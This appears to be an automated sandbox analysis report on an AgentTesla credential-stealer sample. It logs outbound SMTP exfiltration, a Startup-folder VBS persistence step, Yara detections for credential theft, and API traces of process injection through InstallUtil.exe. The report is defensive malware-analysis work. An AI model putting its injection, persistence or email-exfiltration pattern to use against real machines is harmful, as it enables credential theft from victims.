                                                                                                          Dec 3, 2024 15:21:10.960105896 CET | 49759 | 587 | 192.168.2.6 | 162.254.34.31 | .
                                                                                                          Dec 3, 2024 15:21:11.459167004 CET | 587 | 49759 | 162.254.34.31 | 192.168.2.6 | 250 2.0.0 Ok: queued as 416CE89B21

                                                                                                          Target ID:0
                                                                                                          Start time:09:20:39
                                                                                                          Start date:03/12/2024
                                                                                                          Path:C:\Users\user\Desktop\Ref#60031796.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Ref#60031796.exe"
                                                                                                          Imagebase:0x840000
                                                                                                          File size:221'664 bytes
                                                                                                          MD5 hash:654AD72D10AED979428B6B130700754A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2367043467.0000000007080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:09:21:02
                                                                                                          Start date:03/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                          Imagebase:0x4e0000
                                                                                                          File size:42'064 bytes
                                                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3361572023.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3361572023.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:4
                                                                                                          Start time:09:21:13
                                                                                                          Start date:03/12/2024
                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                                                                                                          Imagebase:0x7ff73b1c0000
                                                                                                          File size:170'496 bytes
                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:09:21:13
                                                                                                          Start date:03/12/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\vdvfyt.exe"
                                                                                                          Imagebase:0xca0000
                                                                                                          File size:221'664 bytes
                                                                                                          MD5 hash:654AD72D10AED979428B6B130700754A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 13%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:false


                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.6%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:3%
                                                                                                            Total number of Nodes:301
                                                                                                            Total number of Limit Nodes:15

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 2
                                                                                                            • API String ID: 0-450215437
                                                                                                            • Opcode ID: 824a75beee09fef5c69fa234057a1d97270822a90d4985cf7f6c394143623c4e
                                                                                                            • Instruction ID: abcd2ac37a7e1e2a23cfe71d8e82598f23fa5b32c82bae69b9501c7d12af2809
                                                                                                            • Opcode Fuzzy Hash: 824a75beee09fef5c69fa234057a1d97270822a90d4985cf7f6c394143623c4e
                                                                                                            • Instruction Fuzzy Hash: D3E2D174A002288FDB65DF68D984B9EBBF6FB89301F5085EAD509A7344EB305E85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4
                                                                                                            • API String ID: 0-4088798008
                                                                                                            • Opcode ID: 04375f782ce1bce707dc1808bb741e764a30074505f2b1616a9099c5e530cac5
                                                                                                            • Instruction ID: 9801b49282ff5e828e0278b6ec864b16080f335c3ad7b5804e97f34a474009e6
                                                                                                            • Opcode Fuzzy Hash: 04375f782ce1bce707dc1808bb741e764a30074505f2b1616a9099c5e530cac5
                                                                                                            • Instruction Fuzzy Hash: 88B2F735E00228CFDB54DFA5C894BADB7B6BF48300F198199E505AB3A9DB70AD85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4
                                                                                                            • API String ID: 0-4088798008
                                                                                                            • Opcode ID: 9186e4e0f437df4599667283476eb5f15669a8c5a7f25601d638327a70bd0352
                                                                                                            • Instruction ID: 5dada74e1a7a4befbc18e4ae837960dd4b6360343490dbfe697be166a500478c
                                                                                                            • Opcode Fuzzy Hash: 9186e4e0f437df4599667283476eb5f15669a8c5a7f25601d638327a70bd0352
                                                                                                            • Instruction Fuzzy Hash: 6F221A34E00219CFDB64DFA5C994BADB7B6BF48300F1481A9E509AB3A5DB70AD85CF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1682 682dde2-682de7e NtProtectVirtualMemory 1686 682de80-682de86 1682->1686 1687 682de87-682deac 1682->1687 1686->1687
                                                                                                            APIs
                                                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0682DE71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706961497-0
                                                                                                            • Opcode ID: f323e2edaedaadabf1a9c22f297342c6059835b80747bb7caeeb19e14f23856b
                                                                                                            • Instruction ID: dcc5adec9f500ef94228d7e8ca5007fe6c63b1c8b117e8d4dc8316706b2e01a4
                                                                                                            • Opcode Fuzzy Hash: f323e2edaedaadabf1a9c22f297342c6059835b80747bb7caeeb19e14f23856b
                                                                                                            • Instruction Fuzzy Hash: 682103B5D013499FDB10DFAAD981AEEFBF5FF48310F20842AE519A7210C7759940CBA5
                                                                                                            APIs
                                                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0682DE71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706961497-0
                                                                                                            • Opcode ID: c039abb68fbee184625359336278a4e9a90bcd7e624225046d5ecda125309f2e
                                                                                                            • Instruction ID: fcec9cb76ceaa7e72e2baf28f663c017053ab4f615c19c76ff8a30f4e459bc81
                                                                                                            • Opcode Fuzzy Hash: c039abb68fbee184625359336278a4e9a90bcd7e624225046d5ecda125309f2e
                                                                                                            • Instruction Fuzzy Hash: 942103B1D013499FDB10DFAAD980ADEFBF5FF48310F20842AE519A7210C7759900CBA5
                                                                                                            APIs
                                                                                                            • NtResumeThread.NTDLL(?,?), ref: 0714F66E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 00f76ca75de579b82c93754ebbf988c084db517e9bf17bc056baf573558f7ff2
                                                                                                            • Instruction ID: 4f5306aafeebce4500703c123eade4a236c58b84e07d17a66f8ac78b5a463b4e
                                                                                                            • Opcode Fuzzy Hash: 00f76ca75de579b82c93754ebbf988c084db517e9bf17bc056baf573558f7ff2
                                                                                                            • Instruction Fuzzy Hash: C31136B1D003499FDB10DFAAC481BEEFBF8EF89210F14842AD419A7250CB789945CFA5
                                                                                                            APIs
                                                                                                            • NtResumeThread.NTDLL(?,?), ref: 0714F66E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 08bd83cdb506f8b450d1715de065bc4ab30c740d28a6700744b28db596782eea
                                                                                                            • Instruction ID: b64b3305c80ba13e1cf777951d8abf14113cf20f0a86ec79d568172450e98aa5
                                                                                                            • Opcode Fuzzy Hash: 08bd83cdb506f8b450d1715de065bc4ab30c740d28a6700744b28db596782eea

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 0125EA5E
• GetCurrentThread.KERNEL32 ref: 0125EA9B
• GetCurrentProcess.KERNEL32 ref: 0125EAD8
• GetCurrentThreadId.KERNEL32 ref: 0125EB31
Memory Dump Source
• Source File: 00000000.00000002.2346286188.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1250000_Ref#60031796.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

                                                                                                            Control-flow Graph

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2359107215.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_50f0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da3bd28473ef01d1b2319c1df32c120017421632801816e518f3f6167949b662
                                                                                                            • Instruction ID: fcc51518e53a0f5105acc9effc8175cc782a20ab87e65c8a621693e51f4f8347
                                                                                                            • Opcode Fuzzy Hash: da3bd28473ef01d1b2319c1df32c120017421632801816e518f3f6167949b662
                                                                                                            • Instruction Fuzzy Hash: 289165B1809389EFCB52CFA5D8509DDBFF1BF0A320F1981AAE544AB222D3358855CF51

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0682EE2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 017116997474e208a90d5751bf694dbb1b5b27a15ea2b13c5af2f064f1b62ee5
                                                                                                            • Instruction ID: c1d91046feaea8c214cccd0f488d60e854fb55d4cb2f3b11e6e6752a5c66fd0e
                                                                                                            • Opcode Fuzzy Hash: 017116997474e208a90d5751bf694dbb1b5b27a15ea2b13c5af2f064f1b62ee5
                                                                                                            • Instruction Fuzzy Hash: DA814771D1066A9FDB50CFA9C8867EEBBF1BF48310F148529E854E7280DB748881CF85

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0682EE2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 8975bafe3e39c6e5694adbb22f68d1a6bb9447e21a1d0a9d564728b4d740e355
                                                                                                            • Instruction ID: 0362e4d90c3a30f524785347da1de62c27b22254d90018d17ad7675e6bb026d0
                                                                                                            • Opcode Fuzzy Hash: 8975bafe3e39c6e5694adbb22f68d1a6bb9447e21a1d0a9d564728b4d740e355
                                                                                                            • Instruction Fuzzy Hash: 2F813771D1066A9FDB50CFA9C8857EEBBF1BF88310F148529E854E7280D7748881CF85

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CopyFileA.KERNEL32(?,?,?), ref: 06824A85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CopyFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1304948518-0
                                                                                                            • Opcode ID: d267726ef0ec6e6fb8adb479f37ce3fb89f81eb26364c6574282c4cdf6146fdc
                                                                                                            • Instruction ID: b5d8da14231ea46dd97a37e5d386acbb2fc508a3b37cd15e279087e74022f245
                                                                                                            • Opcode Fuzzy Hash: d267726ef0ec6e6fb8adb479f37ce3fb89f81eb26364c6574282c4cdf6146fdc
                                                                                                            • Instruction Fuzzy Hash: 65518870D0066A9FDB50CFA9C9827AEBBF1EF48310F148529E816F7280D7749881CBA1

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CopyFileA.KERNEL32(?,?,?), ref: 06824A85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CopyFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1304948518-0
                                                                                                            • Opcode ID: b39e2e15efb20d4358626df39c022489494aef32bf02059468d2ded14296535c
                                                                                                            • Instruction ID: 5c662c2aabb23d40884a4277fb7a801db53638b64fad4e83c0eb56e1fb646705
                                                                                                            • Opcode Fuzzy Hash: b39e2e15efb20d4358626df39c022489494aef32bf02059468d2ded14296535c
                                                                                                            • Instruction Fuzzy Hash: 99517870D0076A9FDB50CFA9C9827AEBBF1FF48310F148529E816E7280D7749881CBA5

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050F3302
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2359107215.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_50f0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 89e5ca8ee8154096c9c10e9dc2fb88352107d41242eb3a347f263296c66a73b0
                                                                                                            • Instruction ID: bc02b426534df8141b20516656d74a33edef0f79b61ea505868cac200a217905
                                                                                                            • Opcode Fuzzy Hash: 89e5ca8ee8154096c9c10e9dc2fb88352107d41242eb3a347f263296c66a73b0
                                                                                                            • Instruction Fuzzy Hash: F941ADB1D00349DFDB14CF9AD884ADEBBB5BF88310F24852AE919AB210D775A945CF90

                                                                                                            Control-flow Graph

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2366827807.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6fd0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: d
                                                                                                            • API String ID: 0-2564639436
                                                                                                            • Opcode ID: e991d3a598d57d84439ff8c1989120477d815b72a00483075ca6c171cc9725f3
                                                                                                            • Instruction ID: c66d29237a2007e2331f449ae7fd07eff4b108698de217fb3f159b1d0fb00910
                                                                                                            • Opcode Fuzzy Hash: e991d3a598d57d84439ff8c1989120477d815b72a00483075ca6c171cc9725f3
                                                                                                            • Instruction Fuzzy Hash: 97D16C35A00606CFCB14DF28C894A6AB7F3FF88310B59C969D55A9B3A1DB31F845CB91

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 050F5A01
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2359107215.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_50f0000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 1de13c86e71c585fe5066ba8d2c60a15c8819ca1e5ff6bb39d1a5c2306d19054
                                                                                                            • Instruction ID: f7ee9c001842c6712ad7fd5b6e1239ade22aa01dc88a7e5299714e853df9dd06
                                                                                                            • Opcode Fuzzy Hash: 1de13c86e71c585fe5066ba8d2c60a15c8819ca1e5ff6bb39d1a5c2306d19054
                                                                                                            • Instruction Fuzzy Hash: 5B4127B4900309DFDB14CF99D888AAEBBF5FB89314F24C459E519AB721D774A841CFA0

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1661 682fcb1-682fd06 1664 682fd16-682fd55 WriteProcessMemory 1661->1664 1665 682fd08-682fd14 1661->1665 1667 682fd57-682fd5d 1664->1667 1668 682fd5e-682fd8e 1664->1668 1665->1664 1667->1668
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0682FD48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1672 682fcb8-682fd06 1674 682fd16-682fd55 WriteProcessMemory 1672->1674 1675 682fd08-682fd14 1672->1675 1677 682fd57-682fd5d 1674->1677 1678 682fd5e-682fd8e 1674->1678 1675->1674 1677->1678
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0682FD48
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1702 714a869-714a8f1 VirtualProtect 1706 714a8f3-714a8f9 1702->1706 1707 714a8fa-714a92a 1702->1707 1706->1707
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0714A8E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 1691 682f409-682f45b 1694 682f46b-682f49b Wow64SetThreadContext 1691->1694 1695 682f45d-682f469 1691->1695 1697 682f4a4-682f4d4 1694->1697 1698 682f49d-682f4a3 1694->1698 1695->1694 1698->1697
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0682F48E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0682F48E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0125F0B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2346286188.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1250000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F70EB4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0714A8E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2367400518.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7140000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0682FA86
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F70EB4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362950294.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f70000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0682FA86
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2360678028.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6820000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0125C99E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2346286188.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_1250000_Ref#60031796.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362810753.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f40000_Ref#60031796.jbxd
